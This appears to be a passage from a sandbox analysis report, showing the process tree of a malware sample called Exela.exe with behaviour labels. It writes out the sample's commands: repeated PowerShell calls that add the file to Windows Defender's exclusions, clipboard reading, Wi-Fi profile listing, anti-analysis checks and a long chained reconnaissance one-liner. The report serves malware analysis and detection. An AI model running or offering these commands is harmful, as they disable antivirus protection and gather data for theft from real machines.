        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        98⤵
        
        PID:368
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        98⤵
        
        PID:3388
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        99⤵
        
        PID:2532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        100⤵
        
        PID:2392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        97⤵
        
        PID:3212
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        97⤵
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        98⤵
        
        PID:1752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        99⤵
        
        PID:2948
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        96⤵
        
        PID:2392
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        96⤵
        
        PID:3864
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        97⤵
        
        PID:3924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        98⤵
        
        PID:408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        95⤵
        
        PID:976
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        95⤵
        
        PID:3792
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        96⤵
        
        PID:1088
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        97⤵
        
        PID:4720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        94⤵
        
        PID:1376
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        94⤵
        
        PID:4008
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        95⤵
        
        PID:1448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        96⤵
        
        PID:2912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        93⤵
        
        PID:1088
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        93⤵
        
        PID:1236
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        94⤵
        
        PID:3868
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        95⤵
        
        PID:2104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        92⤵
        
        PID:3520
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        92⤵
        
        PID:3216
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        93⤵
        
        PID:4348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        94⤵
        
        PID:3348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        91⤵
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        91⤵
        
        PID:3676
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        92⤵
        
        PID:740
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        93⤵
        
        PID:5076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        90⤵
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        90⤵
        
        PID:4540
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        91⤵
        
        PID:3736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        92⤵
        
        PID:3004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        89⤵
        
        PID:2304
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        89⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        90⤵
        
        PID:5100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        91⤵
        
        PID:216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        88⤵
        
        PID:4020
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        88⤵
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        89⤵
        
        PID:1060
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        90⤵
        
        PID:2372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        87⤵
        
        PID:1840
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        87⤵
        
        PID:2960
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        88⤵
        
        PID:1700
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        89⤵
        
        PID:3488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        86⤵
        
        PID:1088
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        86⤵
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        87⤵
        
        PID:4348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        88⤵
        
        PID:3092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        85⤵
        
        PID:4776
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        85⤵
        
        PID:4004
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        86⤵
        
        PID:3680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        87⤵
        
        PID:3356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        84⤵
        
        PID:3156
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        84⤵
        
        PID:4764
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        85⤵
        
        PID:736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        86⤵
        
        PID:988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        83⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:604
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        83⤵
        
        PID:644
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        84⤵
        
        PID:2644
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        85⤵
        
        PID:3596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        82⤵
        
        PID:228
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        82⤵
        
        PID:1512
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        83⤵
        
        PID:4428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        84⤵
        
        PID:3824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        81⤵
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        81⤵
        
        PID:3532
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        82⤵
        
        PID:1040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        83⤵
        
        PID:4720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        80⤵
        
        PID:1648
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        80⤵
        
        PID:1288
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        81⤵
        
        PID:1952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        82⤵
        
        PID:1900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        82⤵
        
        PID:3784
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        83⤵
        Detects videocard installed
        
        PID:772
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
        82⤵
        
        PID:3208
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        83⤵
        
        PID:1748
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        82⤵
        
        PID:2756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        82⤵
        
        PID:4756
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        83⤵
        Enumerates processes with tasklist
        
        PID:3348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        82⤵
        
        PID:3356
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        83⤵
        
        PID:1920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        82⤵
        
        PID:1620
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        83⤵
        
        PID:3936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        82⤵
        
        PID:4652
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        83⤵
        Enumerates processes with tasklist
        
        PID:208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        82⤵
        
        PID:4748
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        83⤵
        Enumerates processes with tasklist
        
        PID:4020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        82⤵
        
        PID:1568
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        83⤵
        
        PID:2928
        
        C:\Windows\system32\chcp.com
        
        chcp
        84⤵
        
        PID:2876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        82⤵
        
        PID:1496
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        83⤵
        
        PID:3984
        
        C:\Windows\system32\chcp.com
        
        chcp
        84⤵
        
        PID:4916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        82⤵
        
        PID:2296
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        83⤵
        Enumerates processes with tasklist
        
        PID:5012
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        82⤵
        Clipboard Data
        
        PID:4212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        83⤵
        Clipboard Data
        
        PID:3336
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        82⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3816
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        83⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        82⤵
        Network Service Discovery
        
        PID:456
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        83⤵
        Gathers system information
        
        PID:3224
        
        C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        83⤵
        
        PID:2900
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        83⤵
        Collects information from the system
        
        PID:3156
        
        C:\Windows\system32\net.exe
        
        net user
        83⤵
        
        PID:4208
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        84⤵
        
        PID:3116
        
        C:\Windows\system32\query.exe
        
        query user
        83⤵
        
        PID:2380
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        84⤵
        
        PID:1896
        
        C:\Windows\system32\net.exe
        
        net localgroup
        83⤵
        
        PID:3192
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        84⤵
        
        PID:4032
        
        C:\Windows\system32\net.exe
        
        net localgroup administrators
        83⤵
        
        PID:1300
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        84⤵
        
        PID:2556
        
        C:\Windows\system32\net.exe
        
        net user guest
        83⤵
        
        PID:4968
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        84⤵
        
        PID:4108
        
        C:\Windows\system32\net.exe
        
        net user administrator
        83⤵
        
        PID:5016
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        84⤵
        
        PID:1060
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        83⤵
        
        PID:4860
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        83⤵
        Enumerates processes with tasklist
        
        PID:2176
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        83⤵
        Gathers network information
        
        PID:4432
        
        C:\Windows\system32\ROUTE.EXE
        
        route print
        83⤵
        
        PID:4388
        
        C:\Windows\system32\ARP.EXE
        
        arp -a
        83⤵
        Network Service Discovery
        
        PID:2656
        
        C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        83⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:784
        
        C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        83⤵
        Launches sc.exe
        
        PID:5036
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        83⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4972
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        83⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3148
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        82⤵
        
        PID:1900
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        83⤵
        
        PID:4592
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        82⤵
        
        PID:1312
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        83⤵
        
        PID:3748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        79⤵
        
        PID:208
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        79⤵
        
        PID:3188
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        80⤵
        
        PID:3120
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        81⤵
        
        PID:1512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        78⤵
        
        PID:1988
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        78⤵
        
        PID:2924
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        79⤵
        
        PID:5100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        80⤵
        
        PID:2912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        77⤵
        
        PID:3212
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        77⤵
        
        PID:3968
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        78⤵
        
        PID:4008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        79⤵
        
        PID:5048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        76⤵
        
        PID:1036
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        76⤵
        
        PID:1336
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        77⤵
        
        PID:4420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        78⤵
        
        PID:3576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        75⤵
        
        PID:772
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        75⤵
        
        PID:2900
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        76⤵
        
        PID:5116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        77⤵
        
        PID:2720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        74⤵
        
        PID:660
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        74⤵
        
        PID:2632
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        75⤵
        
        PID:1196
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        76⤵
        
        PID:4628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        73⤵
        
        PID:5116
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        73⤵
        
        PID:3704
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        74⤵
        
        PID:3192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        75⤵
        
        PID:1880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        72⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:464
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        72⤵
        
        PID:3864
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        73⤵
        
        PID:3180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        74⤵
        
        PID:740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        71⤵
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        71⤵
        
        PID:1368
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        72⤵
        
        PID:3172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        73⤵
        
        PID:3296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        70⤵
        
        PID:1840
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        70⤵
        
        PID:3652
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        71⤵
        
        PID:2900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        72⤵
        
        PID:3840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        69⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3156
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        69⤵
        
        PID:1436
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        70⤵
        
        PID:1448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        71⤵
        
        PID:3600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        68⤵
        
        PID:2420
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
